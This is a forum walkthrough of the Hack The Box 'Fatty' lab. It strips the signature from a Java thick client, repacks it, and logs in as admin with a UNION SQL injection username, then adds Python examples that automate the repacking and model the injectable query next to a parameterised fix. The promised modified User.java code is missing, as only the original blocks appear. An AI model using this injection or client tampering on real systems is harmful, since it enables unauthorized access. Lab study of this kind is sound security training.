Exploiting Web Vulnerabilities in Thick-Client Applications

I asked the forum's staff to delete my previous post, as it was no longer editable. There was an issue in the very last step, the SQL injection login command. A modified version of the original "short run" is below.

This section is a part of the 'insane' HTB box "Fatty".
I wonder why HTB decided to put it into the medium module, but whatever.
If you don't want to spend as much time as I did, here is a "fast" run (it should
take around 30-40 min). Spoilers:

  • You don't need to map the IP to server.fatty.htb, as it is already done in the hosts file,
    so you may skip the Wireshark step.
  1. Extract all the files from fatty-client.jar;
  • The file is located in C:\inetpub\ftproot\
  2. Change the port from 8000 to 1337 in beans.xml (<constructor-arg index="1" value = "1337");
  • It might say that you don't have the right privileges, so be sure that
    you've launched Notepad as admin;
  3. Remove the SHA-256 hashes from MANIFEST.MF in the META-INF folder;
  • Again it might say that you don't have the right privileges, so use the admin
    Notepad.
  4. Delete 1.RSA and 1.SF;

  5. Build a new client: jar -cmf .\META-INF\MANIFEST.MF ..\fatty-client-new.jar *

  • I use an admin PowerShell as well;
  • I assume that you cd into C:\inetpub\ftproot\; the client appears in C:\inetpub;
  • Pay attention to *;

Now you might want to check that the newly generated client works as intended, and continue:

  1. Drag the newly generated fatty-client-new.jar into JD-GUI and save all the source files on the Desktop;
  • JD-GUI is located in the TOOLS folder on the Desktop
  2. Extract the files from the newly created fatty-client-new-jar.src.zip on the Desktop (right-click on the archive and extract to fatty-client-new-jar.src\);

  3. Copy fatty-client-new.jar from C:\inetpub to the Desktop;

  4. Find and modify the User.java file in one of the extracted folders (precisely: fatty-client-new.jar.src\htb\fatty\shared\resources\User.java).

You should find the following parts of the code: public User (line 20) and public void setPassword (line 76); you have to modify these methods' code as indicated below:

...............................................................................................             
-ORIGINAL CODE-
...............................................................................................
/*     */    public User(int uid, String username, String password, String email, Role role) {
/*  20 */      this.uid = uid;
/*  21 */      this.username = username;
/*  22 */      this.password = password;
/*  23 */      this.email = email;
/*  24 */      this.role = role;
/*     */    }
...............................................................................................             
-ORIGINAL CODE-
...............................................................................................
/*     */    public void setPassword(String password) {
/*  76 */      this.password = password;
/*     */    }
...............................................................................................             
-ORIGINAL CODE-
...............................................................................................

  • I am not very familiar with Java programming, so I don't know whether it is required to
    keep the line numbers (*/1 etc.) in precise order, or to leave out the numbers for empty
    lines or "}". But I did it in all cases in order not to break anything.

Now you need to build a new client to make your SQL injection; change directory in PowerShell with cd C:\Users\cybervaca\Desktop and continue.

  1. Compile User.java with the following command:
    javac -cp fatty-client-new.jar fatty-client-new.jar.src\htb\fatty\shared\resources\User.java
  • I assume that the fatty-client-new.jar archive and the fatty-client-new.jar.src folder are on the Desktop.
  2. Make a new dir (raw) with mkdir raw;

  3. Copy the new client archive into the raw folder:
    cp fatty-client-new.jar raw\fatty-client-new-2.jar

  4. Open the raw folder and extract the files from fatty-client-new-2.jar (Extract Here);

  5. Overwrite the User.class file in raw\htb\fatty\shared\resources\ with the following command:
    mv -Force fatty-client-new.jar.src\htb\fatty\shared\resources\User.class raw\htb\fatty\shared\resources\
    (there should be only one User.class file). Or you may just drag it from one folder to the other.

  6. cd into raw and build a new client:
    jar -cmf META-INF\MANIFEST.MF client_name.jar .

  • Pay attention: the "." at the end is required!
  7. Launch the client and input the credentials:
    Username: abc' UNION SELECT 1,'abc','a@b.com','abc','admin
    Password: abc
  • Last time the format here wasn't correct, even though I had copied it directly from the Windows system.
    It should work now, but if you have issues and get "Login Failed" or get stuck, feel free to grab
    the Username string from the module.
  8. Server Status should be available now and you can get ipconfig.

P.S. I just followed all the steps and it works!

26 Likes
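The first five steps of the run above (strip the per-entry SHA-256 digests from MANIFEST.MF, delete 1.SF and 1.RSA, change the port in beans.xml, repack) can be done in one pass over the jar instead of by hand in Notepad and an admin PowerShell. The script below is an added example, not part of the post or of the HTB module; it builds a constructed stand-in jar in memory (the manifest entries, the bean class name example.Connection and the digests are all made up) and rewrites it. It assumes the beans.xml entry has the form shown in the post, `<constructor-arg index="1" value="8000"/>`, and that the manifest's main section is everything before the first blank line, which is where the jar signer's `Name:`/`SHA-256-Digest:` sections start.

```python
import io
import re
import zipfile

# Signature entries a signed jar carries next to MANIFEST.MF (step 4 deletes 1.SF / 1.RSA).
SIGNATURE_ENTRY = re.compile(r"^META-INF/[^/]+\.(SF|RSA|DSA|EC)$", re.IGNORECASE)


def strip_signature_sections(manifest: str) -> str:
    """Keep only the main section of MANIFEST.MF (everything before the first blank
    line). The per-entry 'Name:' / 'SHA-256-Digest:' sections after it were added by
    the signer; this is what step 3 removes by hand."""
    main, _sep, _rest = manifest.replace("\r\n", "\n").partition("\n\n")
    # A manifest must end with a line terminator, so re-add the trailing blank line.
    return main.rstrip("\n") + "\n\n"


def patch_port(beans_xml: str, old_port: str = "8000", new_port: str = "1337") -> str:
    """Rewrite <constructor-arg index="1" value="8000"> to the new port (step 2).
    Exactly one match is expected; anything else means this is not the beans.xml the
    post describes, so fail instead of writing a half-patched client."""
    pattern = re.compile(
        r'(<constructor-arg\s+index="1"\s+value\s*=\s*")' + re.escape(old_port) + r'(")'
    )
    patched, count = pattern.subn(lambda m: m.group(1) + new_port + m.group(2), beans_xml)
    if count != 1:
        raise ValueError(f"expected one constructor-arg with value {old_port}, found {count}")
    return patched


def rebuild_unsigned_jar(jar_bytes: bytes, new_port: str = "1337") -> bytes:
    """Return a new jar with signature files dropped, the manifest reduced to its main
    section and the port in beans.xml changed. Entry order is preserved so that
    MANIFEST.MF stays first, as the jar tool expects."""
    src = zipfile.ZipFile(io.BytesIO(jar_bytes))
    out_buf = io.BytesIO()
    with zipfile.ZipFile(out_buf, "w", zipfile.ZIP_DEFLATED) as out:
        for info in src.infolist():
            name = info.filename
            if SIGNATURE_ENTRY.match(name):
                continue
            data = src.read(name)
            if name == "META-INF/MANIFEST.MF":
                data = strip_signature_sections(data.decode("utf-8")).encode("utf-8")
            elif name == "beans.xml":
                data = patch_port(data.decode("utf-8"), new_port=new_port).encode("utf-8")
            out.writestr(name, data)
    return out_buf.getvalue()


def list_entries(jar_bytes: bytes) -> list:
    return zipfile.ZipFile(io.BytesIO(jar_bytes)).namelist()


def read_entry(jar_bytes: bytes, name: str) -> str:
    return zipfile.ZipFile(io.BytesIO(jar_bytes)).read(name).decode("utf-8")


def make_sample_jar() -> bytes:
    """Constructed stand-in for fatty-client.jar (not the real client): a signed
    manifest, the two signature files and a beans.xml pointing at port 8000."""
    manifest = (
        "Manifest-Version: 1.0\n"
        "Created-By: constructed sample\n"
        "\n"
        "Name: beans.xml\n"
        "SHA-256-Digest: c2FtcGxlLWRpZ2VzdC1vbmU=\n"
        "\n"
        "Name: htb/fatty/shared/resources/User.class\n"
        "SHA-256-Digest: c2FtcGxlLWRpZ2VzdC10d28=\n"
        "\n"
    )
    beans = (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<beans>\n"
        '  <bean id="connection" class="example.Connection">\n'
        '    <constructor-arg index="0" value="server.fatty.htb"/>\n'
        '    <constructor-arg index="1" value="8000"/>\n'
        "  </bean>\n"
        "</beans>\n"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("META-INF/MANIFEST.MF", manifest)
        z.writestr("META-INF/1.SF", "Signature-Version: 1.0\n")
        z.writestr("META-INF/1.RSA", b"\x30\x82placeholder-pkcs7")
        z.writestr("beans.xml", beans)
        z.writestr("htb/fatty/shared/resources/User.class", b"\xca\xfe\xba\xbe")
    return buf.getvalue()


if __name__ == "__main__":
    rebuilt = rebuild_unsigned_jar(make_sample_jar())
    print(list_entries(rebuilt))
    print(read_entry(rebuilt, "META-INF/MANIFEST.MF"))
```

On the real box you would read C:\inetpub\ftproot\fatty-client.jar into `rebuild_unsigned_jar` and write the result out as fatty-client-new.jar; the `count != 1` check in `patch_port` is there because a silent no-op patch produces a client that still dials port 8000 and fails in a way that looks like a network problem.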
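Why the login string in step 7 has exactly five values, and why the password column of the injected row is the same 'abc' that is typed into the password field, is easier to see against a model of the server side. The snippet below is an added example, not code from the post, the module or the Fatty server. It assumes a login query that concatenates the username into `SELECT id, username, email, password, role FROM users WHERE username = '...'` and then compares the returned row's password column with the password the client sent; the column order is inferred from the payload, and the users in `SAMPLE_USERS` are constructed. Under that assumption the UNION returns only the attacker's row, whose password column is 'abc', so the check passes as long as the client sends 'abc' untransformed. The same logic with a bound parameter, `login_safe`, is shown beside it.

```python
import sqlite3

# Login string from the post; the server's own closing quote completes the last literal.
PAYLOAD_USERNAME = "abc' UNION SELECT 1,'abc','a@b.com','abc','admin"
PAYLOAD_PASSWORD = "abc"

# Constructed sample accounts (not from the box). The password column holds whatever
# opaque string the server stores; nothing here depends on how it was derived.
SAMPLE_USERS = [
    (1, "alice", "alice@example.test", "stored-secret-alice", "admin"),
    (2, "bob", "bob@example.test", "stored-secret-bob", "user"),
]

LOGIN_COLUMNS = "id, username, email, password, role"


def make_db() -> sqlite3.Connection:
    """In-memory users table with the five columns the payload has to match."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER, username TEXT, email TEXT, password TEXT, role TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def build_login_query(username: str) -> str:
    """Assumed vulnerable server-side query: the username is concatenated in."""
    return f"SELECT {LOGIN_COLUMNS} FROM users WHERE username = '" + username + "'"


def _row_to_user(row, password):
    """Assumed check: the stored password column must equal what the client sent."""
    if row is None or row[3] != password:
        return None
    return {"uid": row[0], "username": row[1], "email": row[2], "role": row[4]}


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """With the UNION payload, WHERE username = 'abc' matches nothing, so the only
    row returned is the attacker-chosen one: (1, 'abc', 'a@b.com', 'abc', 'admin')."""
    row = conn.execute(build_login_query(username)).fetchone()
    return _row_to_user(row, password)


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    """Same logic with a bound parameter: the payload is just a username that does
    not exist, so the login fails."""
    row = conn.execute(
        f"SELECT {LOGIN_COLUMNS} FROM users WHERE username = ?", (username,)
    ).fetchone()
    return _row_to_user(row, password)


if __name__ == "__main__":
    db = make_db()
    print(build_login_query(PAYLOAD_USERNAME))
    print("vulnerable:", login_vulnerable(db, PAYLOAD_USERNAME, PAYLOAD_PASSWORD))
    print("safe:      ", login_safe(db, PAYLOAD_USERNAME, PAYLOAD_PASSWORD))
```

If the stock client altered the password before sending it, the value reaching `_row_to_user` would no longer equal the 'abc' placed in the injected row and the login would fail with the same "Login Failed" the post mentions; that is the kind of client-side behaviour a rebuild of User.java exists to remove, although the post does not state what its change does.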